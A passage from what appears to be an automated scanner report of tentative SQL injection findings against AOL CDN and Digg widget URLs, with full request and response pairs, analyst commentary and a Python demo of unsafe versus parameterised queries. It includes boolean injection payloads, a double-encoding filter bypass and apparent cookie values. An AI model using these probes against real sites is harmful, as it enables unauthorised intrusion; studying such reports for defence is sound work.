Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
ntCoent-Length: 1159
Cache-Control: public, max-age=30
Expires: Thu, 05 May 2011 01:10:14 GMT
Date: Thu, 05 May 2011 01:09:44 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1159

<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - Unknown File: /fanhouse17216175' or 1=2-- /design/v2/css/fanhouse.css</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Unknown File: /fanhouse17216175' or 1=2-- /design/v2/css/fanhouse.css</u></p><p><b>description</b> <u>The requested resource (Unknown File: /fanhouse17216175' or 1=2-- /design/v2/css/fanhouse.css) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>

1.7. http://o.aolcdn.com/os/fonts/helvetica_lt_77_bold_condensed-webfont.woff [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.aolcdn.com
Path:   /os/fonts/helvetica_lt_77_bold_condensed-webfont.woff

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 22210006'%20or%201%3d1--%20 and 22210006'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /os/fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006'%20or%201%3d1--%20 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 14 Apr 2010 18:22:52 GMT
Content-Type: image/gif
Content-Length: 3488
Cache-Control: public, max-age=94670778
Expires: Sun, 04 May 2014 18:47:14 GMT
Date: Thu, 05 May 2011 01:20:56 GMT
Connection: close

GIF89ax.Z.....3f3.3f3f.f.........333fff.....333ff.......3.3f3f.f........f...33...3..fff3..f......f3..f3..f...3...33.fff33.ff...............fff333............................................................,....x.Z......pH,....r.l:...tJ.Z...v..z...xL.....
...V,..M....J}E.Aqs|h.B(&.D...Dwx+p+.c    '.(....%..%%).$.+#)#xq.p,.X.......&(...........x..q).S.&..)).).&........%$..,p., .Ip*..(.$.........(......%.a..h......b.N..d.T...p..[........P..e... ..,*.......yFx..    .F..p....C...%O".s..2.-.....d..(S...q..9.........F4.$.@.rr..y..A..O.A../.?..H..9.....&bhZ...q.
....RR?......-..(Ax%A....?...X........d.P.VMY.8....b
..TP...?.?..d6...*O%?Eq....4.R{.A..+a.4..bA....Vy......QKAK....)...J9x.FW._...p.$...
....
...J[K........gc...d..b.
....B...B.......-Y..k,,..J..'.p........O=....tj...k....X*H4#....T.........O0.Pw.[.1U.D.0y.s...RB..".y....CI=..k#|8.
.#.
.$w.\..$.R.    V%    >j).    .<e._*d.A....!    x...pQ..T1.^.Iw.u`..Bh..d...W...'.X0...v.....u..#..`..x..D)....Y...$....5gk......a.U$x......:.D...!$....[.n.E.p)$..    . [&$.a.a.d...Z.v..q)..\z>6.K/...[+...!...{...)f.u0E..[......f..t...c.3.:jJ-.{.vN5..l..@........&.as.}.G.H...R.M...@...6."..F...$.+...)........f$..y
..N.I    ..$....bwG..+...+.X+.....J..`{O..."...^~...Wu...t..b....G^a.~..jf..P    *.2..*q....tP.f.~........{...hnF.L: ...    Y/906.........a../..^.$.W...0...d..@.?.!.E.i.x<...R..B
.^7Y..e...~..k.....4!.h....(......hhl."F$.U.u. ...
..U..h.'....@#..Le...........8.X.ST.    .....+[..C..p..U.B..e.%AJX..) `..8E....nl...-@..0Z.b..@..9..B.e%........f.R..8.,......3.%..04...*...a .&...#.1.j....H$....hp.*
L.S.@..t    .!sF0.,..\.@.....i.#nz.......BKB,.Q..X...&tZ[..u.O2+,...(....Y.s........UF.T.b.V.....W>.$...2.    -D.t..2....-%R..\....X.p...J...q..@.h..&r.~..4*.......h.0fI.n4&.b.$..C.P^"..6sW.....Y.    .R9a#.
...[SNIP]...

Request 2

GET /os/fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006'%20or%201%3d2--%20 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
ntCoent-Length: 1201
Cache-Control: public, max-age=30
Expires: Thu, 05 May 2011 01:21:26 GMT
Date: Thu, 05 May 2011 01:20:56 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1201

<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - Unknown File: /fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006' or 1=2-- </h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Unknown File: /fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006' or 1=2-- </u></p><p><b>description</b> <u>The requested resource (Unknown File: /fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006' or 1=2-- ) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>

1.8. http://o.aolcdn.com/os/mobile-desktop/js/mobileblog.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.aolcdn.com
Path:   /os/mobile-desktop/js/mobileblog.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 14243832'%20or%201%3d1--%20 and 14243832'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /os/mobile-desktop14243832'%20or%201%3d1--%20/js/mobileblog.js HTTP/1.1
Host: o.aolcdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 14 Apr 2010 18:22:52 GMT
Content-Type: image/gif
Content-Length: 3488
Cache-Control: public, max-age=94670778
Expires: Mon, 05 May 2014 04:24:32 GMT
Date: Thu, 05 May 2011 10:58:14 GMT
Connection: close

GIF89a ... [binary GIF image body, 3488 bytes, not reproduced] ...
...[SNIP]...

Request 2

GET /os/mobile-desktop14243832'%20or%201%3d2--%20/js/mobileblog.js HTTP/1.1
Host: o.aolcdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
ntCoent-Length: 1147
Cache-Control: public, max-age=30
Expires: Thu, 05 May 2011 10:58:44 GMT
Date: Thu, 05 May 2011 10:58:14 GMT
Content-Length: 1147
Connection: close

<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - Unknown File: /mobile-desktop14243832' or 1=2-- /js/mobileblog.js</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Unknown File: /mobile-desktop14243832' or 1=2-- /js/mobileblog.js</u></p><p><b>description</b> <u>The requested resource (Unknown File: /mobile-desktop14243832' or 1=2-- /js/mobileblog.js) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>

1.9. http://o.aolcdn.com/os/realestate/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.aolcdn.com
Path:   /os/realestate/favicon.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 51809587'%20or%201%3d1--%20 and 51809587'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, which the scanner interprets as the input being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. The 200 response here is the same 3488-byte GIF with the same Last-Modified value (Wed, 14 Apr 2010 18:22:52 GMT) that issue 1.8 received for a request for a .js file, which shows it is a fixed asset the server hands out regardless of what was requested rather than content produced by a query; the "false" request again gets the Tomcat 404 page. The same caveat as in 1.8 applies: nothing shown proves that the response depends on the injected condition rather than on how the CDN routes unknown paths.

Request 1

GET /os/realestate51809587'%20or%201%3d1--%20/favicon.ico HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 14 Apr 2010 18:22:52 GMT
Content-Type: image/gif
Content-Length: 3488
Cache-Control: public, max-age=94670778
Expires: Sun, 04 May 2014 18:53:58 GMT
Date: Thu, 05 May 2011 01:27:40 GMT
Connection: close

GIF89a ... [binary GIF image body, 3488 bytes, identical to the one in 1.8, not reproduced] ...
...[SNIP]...

Request 2

GET /os/realestate51809587'%20or%201%3d2--%20/favicon.ico HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Cteonnt-Length: 1120
Cache-Control: public, max-age=30
Expires: Thu, 05 May 2011 01:28:10 GMT
Date: Thu, 05 May 2011 01:27:40 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1120

<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - Unknown File: /realestate51809587' or 1=2-- /favicon.ico</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Unknown File: /realestate51809587' or 1=2-- /favicon.ico</u></p><p><b>description</b> <u>The requested resource (Unknown File: /realestate51809587' or 1=2-- /favicon.ico) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>

1.10. http://o.aolcdn.com/os_merge/ [file parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.aolcdn.com
Path:   /os_merge/

Issue detail

The file parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each appended to one of the eighteen file values in the request (/aol/jquery.multiauth-1.0.min.js). These two requests resulted in different responses, indicating that the input may be incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. Here the difference deserves a closer look: both responses are 200 with the same Last-Modified value, but Response 1 is 122281 bytes and contains the aol-multiauth module (namespace:"aol-multiauth", g.multiAuth=function) immediately after the aolShare code, whereas Response 2 is 118535 bytes and goes straight from aolShare to the globalHeader module. The tampered entry was therefore resolved when the appended condition was true and dropped when it was false, while the other seventeen entries were unaffected. That is what a name lookup behaves like when the value is spliced into a query and the trailing quote is neutralised by the -- comment, and it is not what a plain filesystem lookup would do, since neither tampered name exists as a file. Confirm manually with a second pair that uses different constants (for example ' and 2=2-- against ' and 2=3-- ), send each more than once, and compare both against an untampered request.

Request 1

GET /os_merge/?file=/aol/jquery-1.4.3.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.truncate-1.0.min.js&file=/aol/jquery.openwindow-1.0.min.js&file=/aol/jquery.shorturl.min.js&file=/aol/jquery.aolshare.debug.min.js&file=/aol/jquery.multiauth-1.0.min.js'%20and%201%3d1--%20&file=/aol/jquery.globalheader-1.5.min.js&file=/aol/jquery.globalsearchbox-1.5.min.js&file=/aol/aol.relatedvideo.min.js&file=/music/js/delegate.js&file=/music/js/jquery.twitter.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js&file=/aol/jquery.aolmostpopular.min.js&file=/music/js/feedback.js&file=/music/js/artist-legacy-hubs.js&v=5 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/radioguide/bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 14:47:44 GMT
Content-Type: application/javascript
Cache-Control: public, max-age=3600
Expires: Thu, 05 May 2011 02:18:22 GMT
Date: Thu, 05 May 2011 01:18:22 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 122281

/*!
* jQuery JavaScript Library v1.4.3
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
;U.devId=(f.aolGetAuthToken.devId||devId);o(U)}})})}});n.replaceWith(G)}};f.fn.aolShare=function(l){return this.each(function(){l=l||{};l.elem=this;f.aolShare(l)})}})(jQuery,window,document);(function(g,i,m){var n=i.location,f=g(m),j=encodeURIComponent,l=0,d,e={namespace:"aol-multiauth",devId:"ao1ARQUlqDsixdht",successUrl:n.protocol+"//"+n.hostname+"/_uac/authReceiver.html",tabs:["aol","aim","facebook","google","yahoo","twitter"],branded:0,reload:0,lang:"en",locale:"us",snsAuthenticated:0,snsServer:"http://my.screenname.aol.com",authServer:"http://api.screenname.aol.com"},a={namespace:"aol-getToken",devId:"ao1ARQUlqDsixdht",authServer:"http://api.screenname.aol.com",callback:function(){}},c,h=[],b=0,o=navigator.userAgent.toLowerCase(),k=o.indexOf("safari")!==-1&&o.indexOf("chrome")===-1;g.multiAuth=function(q){if(q.authLink){var p=g.extend({},e,q),v=p.namespace,B=p.authServer,E=p.snsServer,z=p.devId,r=p.successUrl,F=p.authLink,G=p.branded,H=p.lang,A=p.locale,y=p.selectedTab,x=p.snsSiteDomain,D=p.snsPopupSiteState||j("OrigUrl="+j(r)),C=p.snsIframeSiteState||j("OrigUrl="+j(n)),t=p.snsAuthenticated;g.multiAuth.devId=z;function w(R,S){function T(U){b=0;U.preventDefault();var V=[E,"/_cqr/login/login.psp?uitype=popup&sitedomain=",x,"&lang=",H,"&locale=",A,O?"&st="+O:"","&siteState=",D].join(""),W=[B,"/auth/login?devId=",j(z),M.length===1?"&idType="+M.toString():"&supportedIdType="+M.join(","),O?"&st="+O:"","&language=",H+"-"+A,"&f=qs&succUrl=",j(r)].join("");g.openWindow(x?V:W,{width:528,height:G?530:395})}function J(V){b=0;V.preventDefault();var U=[B,"/auth/logout?devId=",j(z),"&a=",j(d),"&language=",H+"-"+A,"&f=json&succUrl=",j(r),"&doSNSLogout=1"].join("");if(k){g.openWindow(U,{width:528,height:G?530:395,focus:0});i.focus()}else{g("<iframe/>").attr("src",U).css({border:0,margin:0,width:0,height:0}).appendTo("body")}}var K=R.response,L=parseInt(K.statusCode,10),M=S.tabs,O=S.selectedTab,I,Q="click.ma";if(L===200){var 
P=R.response.data.userData.attributes,N;if(!P.pictureUrl){N=P.providerDisplayName;if(!N||N==="Aol"||N==="Aim"){P.pictureUrl="http://expapi.oscar.aol.com/expressions/get?f=native&type=buddyIcon&t="+P.loginId}}f.trigger("token-success."+v,{key:z,response:R.
...[SNIP]...

Request 2

GET /os_merge/?file=/aol/jquery-1.4.3.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.truncate-1.0.min.js&file=/aol/jquery.openwindow-1.0.min.js&file=/aol/jquery.shorturl.min.js&file=/aol/jquery.aolshare.debug.min.js&file=/aol/jquery.multiauth-1.0.min.js'%20and%201%3d2--%20&file=/aol/jquery.globalheader-1.5.min.js&file=/aol/jquery.globalsearchbox-1.5.min.js&file=/aol/aol.relatedvideo.min.js&file=/music/js/delegate.js&file=/music/js/jquery.twitter.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js&file=/aol/jquery.aolmostpopular.min.js&file=/music/js/feedback.js&file=/music/js/artist-legacy-hubs.js&v=5 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/radioguide/bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 14:47:44 GMT
Content-Type: application/javascript
Cache-Control: public, max-age=3600
Expires: Thu, 05 May 2011 02:18:23 GMT
Date: Thu, 05 May 2011 01:18:23 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 118535

/*!
* jQuery JavaScript Library v1.4.3
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
;U.devId=(f.aolGetAuthToken.devId||devId);o(U)}})})}});n.replaceWith(G)}};f.fn.aolShare=function(l){return this.each(function(){l=l||{};l.elem=this;f.aolShare(l)})}})(jQuery,window,document);(function(a){a.fn.globalHeader=function(i){var d={activeTab:null,dualSearchBox:true,moreLinks:[],morePromoCount:2,moreText:"You might also like:",moreAnd:"and",moreMore:"More",moreTextHeadline:"More Sites You Might Like",webBaseUrl:"http://search.aol.com/aol/",webInv:"hdt-spinner",uiHat:"#head",uiWebForm:"#aol-header-search-form",uiWebInput:"#aol-header-search-input",uiWebButton:"#aol-header-search-icon",uiHatLinks:"#aol-header-links",uiHatTools:"#aol-header-auth-link",uiHatMorePopup:"#aol-header-more-list",uiNavLi:"li.nav-category",uiNavADd:".ad-728-90",auth:{doAuth:false,authenticated:false,authState:null,unauthState:null},search:{uiSearch:"#aol-header-search",params:{}},fn:{}},j={},f=this,g={},h={activeTab:null,moreLinksBuilt:false},c={init:function(k){g.$d=a(document);g.$c=a(k);g.hat=a(j.uiHat)[0];g.hatLinks=a(j.uiHatLinks)[0];g.$hatTools=a(j.uiHatTools);g.$webSearchForm=a(j.uiWebForm);g.$webSearchInput=a(j.uiWebInput);g.$webSearchButton=a(j.uiWebButton);g.$search=a(j.search.uiSearch);g.$searchInput=g.$search.find("input:first");g.$searchSubmit=g.$search.find("input:last");g.$navLi=g.$c.find(j.uiNavLi);g.$navADd=g.$c.find(j.uiNavADd);g.$hatMoreList=a(j.uiHatMorePopup);c.setActiveTab(null,j.activeTab);if(j.auth.doAuth){c.buildAuth()}if(j.dualSearchBox){b()}c.buildMoreLinks();c.buildDropDowns();g.$c.bind("setActiveTab",function(m,l){c.setActiveTab(m,l)});g.$c.bind("setAuthState",function(m,l){c.buildAuth(m,l)});if(j.search.params.initFocus!==undefined&&j.search.params.initFocus){g.$search.globalSearchBox(j.search.params)}else{g.$searchInput.bind("focus.aol-header",function(l){c.buildSearch(l)}).attr("autocomplete","off");g.$searchSubmit.bind("mouseover.aol-header",function(l){c.buildSearch(l)});if(j.search.params.searchText!==undefined&&j.search.params.searchText!==""){g.$sear
chInput.val(j.search.params.searchText)}}if(j.search.params.useCustomQuery===true){g.$searchInput.after('<input id="search-customvar" type="hidden" name="'+j.search.params.customQueryName+'" value="'+j
...[SNIP]...
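
The following is an added example, not code from this report or from AOL's os_merge service, showing why a true/false pair behaves the way the two responses above do if the file name is resolved through a string-built SQL query. The in-memory SQLite catalogue, the table layout and the lookup functions are assumptions made for the demonstration; the page does not show how os_merge actually resolves file names. The same merge routine is run once with the vulnerable lookup and once with a parameterised one.

```python
import sqlite3

# Constructed stand-in for a catalogue that maps "file" entries to their
# contents. The report does not show how os_merge resolves file names; a
# database-backed lookup is an assumption made here to reproduce the effect.
SAMPLE_FILES = [
    ("/aol/jquery-1.4.3.min.js", "/*! jQuery JavaScript Library v1.4.3 */"),
    ("/aol/jquery.aolshare.debug.min.js", "/* aolShare */"),
    ("/aol/jquery.multiauth-1.0.min.js", "/* aol-multiauth */"),
    ("/aol/jquery.globalheader-1.5.min.js", "/* globalHeader */"),
]

# The two values the scanner sent for the tampered entry, URL-decoded.
TRUE_PAYLOAD = "/aol/jquery.multiauth-1.0.min.js' and 1=1-- "
FALSE_PAYLOAD = "/aol/jquery.multiauth-1.0.min.js' and 1=2-- "


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE files (path TEXT PRIMARY KEY, body TEXT)")
    db.executemany("INSERT INTO files VALUES (?, ?)", SAMPLE_FILES)
    return db


def lookup_unsafe(db, path):
    """Vulnerable pattern: the file name is spliced into the SQL text.

    With path = "...min.js' and 1=1-- " the statement becomes
        SELECT body FROM files WHERE path = '...min.js' and 1=1-- '
    so the injected condition decides whether the row comes back.
    """
    sql = "SELECT body FROM files WHERE path = '" + path + "'"
    return [row[0] for row in db.execute(sql)]


def lookup_safe(db, path):
    """Hardened pattern: the name is bound as a parameter, never parsed as SQL."""
    sql = "SELECT body FROM files WHERE path = ?"
    return [row[0] for row in db.execute(sql, (path,))]


def merge(db, names, lookup):
    """Concatenate whatever the lookup returns for each requested name, the
    way a merge endpoint would; names that resolve to nothing are skipped."""
    parts = []
    for name in names:
        parts.extend(lookup(db, name))
    return "\n".join(parts)


def probe(db, lookup, base_names):
    """Mirror the scanner's check: the same request with a true and with a
    false condition appended to one entry; return the two output sizes."""
    true_out = merge(db, base_names + [TRUE_PAYLOAD], lookup)
    false_out = merge(db, base_names + [FALSE_PAYLOAD], lookup)
    return len(true_out), len(false_out)


if __name__ == "__main__":
    db = make_db()
    base = ["/aol/jquery-1.4.3.min.js", "/aol/jquery.aolshare.debug.min.js"]
    print("unsafe lookup (true, false) sizes:", probe(db, lookup_unsafe, base))
    print("safe lookup   (true, false) sizes:", probe(db, lookup_safe, base))
```

With the unsafe lookup the true payload returns the tampered entry and the false one drops it, which is the shape of the size difference between Response 1 and Response 2; with the bound parameter neither payload matches anything and the two outputs are identical, so a difference-based probe has nothing to report.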

1.11. http://widgets.digg.com/buttons/count [url parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The url parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the url parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to block SQL injection attacks, but the scanner reports that this can be circumvented by double URL-encoding the blocked characters, for example by submitting %2527 instead of the ' character. Only the double-encoded requests are shown below; no request with a plain quote is included, so the claim that a plain quote is blocked cannot be checked from this page.

The evidence is thin. The "error" in Response 1 is a 503 Service Unavailable carrying X-CDN: Cotendo and no application Server header, whereas Response 2 is served by TornadoServer/0.1; the 503 therefore came from the CDN edge or a proxy in front of the application, not from a database error path, and a single 503 can just as well be a timeout or a transient backend failure. The JSON in Response 2 echoes the value as %27%27, that is after exactly one URL-decode, which is what the web server does on its own; nothing shown demonstrates that a second decode takes place before the value reaches a query. Re-send Request 1 several times and send the same URL with a plain %27 and with a harmless suffix of the same length before treating this as an injection point.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the url request parameter, as the web server will already have carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, so that the value that is validated is the value that reaches the query.

Request 1

GET /buttons/count?url=http%3A//techcrunch.com/2011/05/04/mashery-funding-2/%2527 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response 1

HTTP/1.1 503 Service Unavailable
Content-Length: 62
Accept-Ranges: bytes
Date: Thu, 05 May 2011 01:23:55 GMT
Cache-Control: private, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-CDN: Cotendo
Connection: Keep-Alive

<html><body><b>Http/1.1 Service Unavailable</b></body> </html>

Request 2

GET /buttons/count?url=http%3A//techcrunch.com/2011/05/04/mashery-funding-2/%2527%2527 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response 2

HTTP/1.1 200 OK
Age: 0
Date: Thu, 05 May 2011 01:23:56 GMT
Via: NS-CACHE: 100
